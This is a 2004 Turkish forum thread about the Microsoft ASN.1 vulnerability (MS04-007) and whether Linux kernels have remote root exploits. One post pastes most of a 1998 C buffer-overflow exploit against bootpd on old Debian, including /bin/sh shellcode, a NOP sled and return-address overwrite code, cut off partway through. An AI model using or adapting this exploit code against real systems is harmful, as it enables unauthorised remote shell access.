Jump to content
Forumu Destekleyenlere Katılın ×
Paticik Forumları
2000 lerden beri faal olan, çok şukela bir paylaşım platformuyuz. Hoşgeldiniz.

Microsoft ASN Açığı !


sharky

Öne çıkan mesajlar

California merkezli eEye Digital Security firmasından güvenlik sorumlusu Marc Maiffret´in açıklamasına göre Microsoft ASN.1 (Abstract Syntax Notation 1) açığı şimdiye dek Microsoft Windows işletim sistemi ailesinde bulunmuş en önemli açıklardan biri. Bu açıktan faydalanan kötü niyetli bir yazılım uzaktan sisteminize erişip onaylanmamış herhangi bir kodu yükleyip sistem ayrıcalıkları ile çalıştırabiliyor. Microsoft´tan alınan bilgiye göre bu açık Windows NT 4.0, Windows 2000, Windows XP ve Windows Server 2003 işletim sistemlerini etkiliyor ve kritik hata kategorisinde.

Maiffret´e göre açığın tespit edilip Microsoft´a bildirilmesi ile gerekli yamanın çıkarılması arasında geçen süre 200 gün. Eğer MS Windows işletim sistemlerinden birini kullanıyorsanız lütfen gerekli yamayı sisteminize yüklediğinizden emin olun (aşağıdaki bağlantılardan faydalanabilirsiniz).

Kaynaklar:
- SearchSecurity
- Microsoft Security Bulletin MS04-007

Alıntı : www.fazlamesai.net[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't..

-EE
Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM

Google Search : "Türkiyenin en iyi hosting firması"
Link to comment
Sosyal ağlarda paylaş

klasik olaylar bunlar, abartmayalim.
windows update'e bakarsaniz surekli "for example, it allows code execution" diyen bi hata gorursunuz hehe :)

gecen de 2.4 2.2 ve 2.6 kernellerini iceren bi acigi bulunmustu linux'un. yine code execution. isletim sistemlerinin klasik problemidir hehe.[signature][hline]raki asmis biseydir
Link to comment
Sosyal ağlarda paylaş

2.4.x ve 2.6.x de çok açık bulundu, ama local root exploiti veren şu ana kadar duymadım.. Yani 2.4.x ve 2.6.x serisinden. Esas sorun, Windows bunları remote root exploit olarak veriyor. Linux'ta nereye remote dan root alıyormuşsun kernelden ?[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't..
-EE
Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM

Google Search : "Türkiyenin en iyi hosting firması"
Link to comment
Sosyal ağlarda paylaş

Zaten her windows muhalefetini olağanüstü ve veri kaybına yol açacak şekilde bile olsa , olağanüstü değil herzaman oluyor diye diye bu raddeye kadar sömürttük kendimizi.

Çok önemli bir word dosyasında bir konuşma yazıyorsun

ara ara save alman gerek , ama unutuyorsun almayı , explorer en alakasız yerde patlıyor
bütün işlerin iptal ..

ama ne o ? sıradan bir olay bu önemsenecek değil.

iddia ediyorum bu windows sürümlerinde sonsuza kadar açık cıkacaktır. Kusursuz işletim sistemi olmaz değil olay, patchlerin yapılmasına rağmen güncellemelere rağmen sürekli bozulacak bu

[Bu mesaj Arkansis tarafından 13 February 2004 18:40 tarihinde değiştirilmiştir]
Link to comment
Sosyal ağlarda paylaş

  • Genel Yönetici
abi microsoft'unda işi zor bence paso millet düşman açıklarını buluyor :)
daha sonra yeni versionunda bu açıklarını kapaması fln yani zor tabi..[signature][hline]===> orc_lord <===
Buddy'nin resimlerine gider..
Çok abuk subuk bir ismim var bana artık orc da diyebilirsiniz sadece orc :-p
Link to comment
Sosyal ağlarda paylaş

Yukarda 2.4 ve 2.6 serisinden bahsediyorum :) Aynı zamanda eski hangi sürümde ? Remote root dan bahsediyoruz.. Öncelikle bir servis çalışmalı.. Bana o remote root exploiti olan kerneli söyle, bir makina kurayım, girebilene aşkolsun.

Belirli bir port bind edilmedikten sonra, kernel hiçbir zaman kafasından bir port bind edip bir hizmet sunmaz ordan. Ha eğer bu remote root Apache x.x.x ile olmuşsa, o Apache 'nin bugıdır.. Ha Apache yardımı ile kerneli kullanarak bir exploit yaratılmışsa, burada ilk düşünülmesi gereken, ben Apache'nin bu olayını nasıl kaparım olmalı.. Kernel daha sonra.[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't..
-EE
Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM

Google Search : "Türkiyenin en iyi hosting firması"
Link to comment
Sosyal ağlarda paylaş

Debian Linux 1.3'ün remote exploiti var..
/*
* Bootpd Exploit against debian linux 1.3 and 2.0 and possibly other
*
* (C) 1998 Willem Pinckaers [email protected]
*
*
* Broken ass code fixed by Bronc Buster - Dec 1998
*
* If you get this and it's missing the two .h files
* just forget it (unless you are lucky and have them already)
* Anyone with half a brain could of fixed this to work, so if
* you are using this now, either I gave it to you, or you are
* a k0d3 kIdDi3 ;)
*
* to complie: gcc bootpd.c -o bootp
*
*/

#include
#include
#include
#include
#include
#include
#include "bootp.h"
#define MAX_MSG_SIZE 500

char shellcode[] =
"x31" "xc9" "x89" "xc8" "x04" "x66" "x41" "x89" "xca" "x89" "xcb"
"xeb" "x7f" "x5f" "x89" "x4f" "x08" "x41" "x89" "x4f" "x04" "x80"
"xc1" "x04" "x89" "x4f" "x0c" "x8d" "x4f" "x04" "xcd" "x80" "x89"
"x07" "x31" "xc9" "x80" "xc1" "x02" "x66" "x89" "x4f" "x0c" "x66"
"x89" "x4f" "x0e" "x80" "xc1" "x0e" "x66" "x89" "x4f" "x08" "x66"
"xb9" "x30" "x39" "x66" "x89" "x4f" "x0e" "x8d" "x47" "x0c" "x89"
"x47" "x04" "x31" "xc9" "xb1" "x03" "x89" "xca" "x89" "xcb" "x89"
"xf9" "x31" "xc0" "x04" "x66" "xcd" "x80" "x31" "xc0" "x89" "xc1"
"x04" "x3f" "x89" "xc2" "x8b" "x1f" "xcd" "x80" "x89" "xd0" "x41"
"xcd" "x80" "x89" "xd0" "x41" "xcd" "x80" "x31" "xc0" "x89" "x47"
"x10" "x88" "x47" "x1b" "x8d" "x47" "x14" "x89" "x47" "x0c" "x31"
"xc0" "x04" "x0b" "x8d" "x5f" "x14" "x8d" "x4f" "x0c" "x8d" "x57"
"x10" "xcd" "x80" "x31" "xc0" "x40" "xcd" "x80" "xe8" "x7c" "xff"
"xff" "xff" "x2e" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x41"
"x41" "x41" "x41" "x41" "x41" "x39" "x30" "xc0" "xa8" "x01" "x01"
"x2f" "x62" "x69" "x6e" "x2f" "x73" "x68" "x00";

#define SERVER_PORT 67

char client_addr[16] = "127.000.000.001";
char host_addr[16] = "207.053.133.005";
int realpath_adjust = 0;
int exploit_length = 1200;


struct sockaddr_in server_addr;
void sendpacket(int, struct bootp *);
void build_packet(struct bootp *, int, char**);
void get_args(int, char**);
void usage(void);

int main(int argc, char *argv[])
{
struct bootp* bp;
int s;

get_args(argc, argv);

server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(SERVER_PORT);
server_addr.sin_addr.s_addr = inet_addr(host_addr);


if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
fprintf(stderr, "cannot create socketn");
exit(1);
}
if ((bp = (struct bootp*) malloc(MAX_MSG_SIZE + 1000)) == NULL) {
(void) fprintf(stderr, "Cannot malloc.n");
exit(1);
};
(void) memset(bp, 0, MAX_MSG_SIZE + 1000); /* ai exploit isn't secure */
build_packet(bp, argc, argv);

sendpacket(s, bp);
}

void sendpacket(int s, struct bootp *bp)
{
if (sendto(s, (const void *) bp, MAX_MSG_SIZE, 0,
(const struct sockaddr *) &server_addr,
sizeof(struct sockaddr_in)) == -1) {
fprintf(stderr, "sendpacket: sendto returned -1 ;(n");
exit(1);
}
}

void build_packet(struct bootp *bp, int argc, char *argv[])
{
unsigned long start_realpath = 0xbffff684 + realpath_adjust;
unsigned long addr_ret_addr = start_realpath + 8 + 0x488;
unsigned long temp_addr, temp_addr2 = 0;
int length_tftpdir = 1; // no ftpdir just a slash at the start..
int num_nops = 600;
char *p;
unsigned long *q;
int i;

bp->bp_op = BOOTREQUEST;
bp->bp_xid = 58524;
bp->bp_htype = HTYPE_ETHERNET;
bp->bp_hlen = 6;
bp->bp_ciaddr.s_addr = inet_addr(client_addr);

printf("Using: client: %sn", client_addr);
printf("Using: server: %sn", host_addr);
printf("Addr of realpath: %xn", start_realpath);
p = bp->bp_file;
/* Putting in nops */
for (i = 0; i < num_nops; i++)
*p++ = 0x90;
printf("Added: %d nopsn", num_nops);

/* Putting in shellcode */
for(i = 0; i < strlen(shellcode); i++)
*p++ = shellcode[i];
printf("%d bytes of shellcode added.n", strlen(shellcode));

/* Aligning to make sure the ret_addr is placed correctly */
temp_addr = p - bp->bp_file + length_tftpdir + start_realpath;
for(i = 0; i < (addr_ret_addr - temp_addr) % 4; i++)
*p++ = 'a';
printf("%d bytes of alignment added.n", (addr_ret_addr - temp_addr) %4);

/* set return adress.. hopefully in exploit code.... */
temp_addr2 = start_realpath + length_tftpdir + (num_nops / 2);
if (!(temp_addr2 & 0xff)) temp_addr2++;
printf("Setting return addr to: %x n", temp_addr2);
q = (unsigned long *) p;
do {
*q++ = temp_addr2;
p = (char *) q;
} while ((p - bp->bp_file) < exploit_length);
*p++ = '';
printf("Exploit length: %d n", strlen(bp->bp_file));
}

void get_args(int argc, char *argv[])
{
int ch;
while ((ch = getopt(argc, argv, "c:s:a:e:")) != EOF)
Link to comment
Sosyal ağlarda paylaş

Yine dediklerimi anlamamissin.

printf("bootpd exploit against debian linux 1.3 and 2.0 (probably others)n";

Bak ne yaziyor ? Bootpd.. Yani Bootp daemonun acigi bu. Bootpd yi kapatirsan, boyle bir acik soz konusu olmaz. Yani olay yine direk olarak Kernel ile iliskili degil. Gecenlerde de Proftpd nin acigi vardi, 2-3 ay once. Bunun da kernel ile ilgisi yoktu.

Ya ben anlatamiyorum, ya da anlamamakta direniyorsunuz.[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't..
-EE
Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM

Google Search : "Türkiyenin en iyi hosting firması"
Link to comment
Sosyal ağlarda paylaş

Ehe sharky hiç uğraşma bence : ) Anlamıo o ben senden önce test ettim ama REJECTED yani :P eueuhe[signature][hline]Uniyasam.Com Admin / ICQ#85889898
Grafiker ( Corel Draw & Photoshop ).
Autocad öğrenmek zorunda kalmış olan kişi.
Fizik okumayı bilinçli olarak seçen bilgisayar manyağı ve ruh sağlığı yerinde olmayan biri.
sharky, 08 January 2004 00:30 tarihinde demiş ki:
Sakin olalim. Sakin sakin cevap verelim. Zorla sakinlestirilmek icin parmak kaldirmayalim.
Link to comment
Sosyal ağlarda paylaş

×
  • Yeni Oluştur...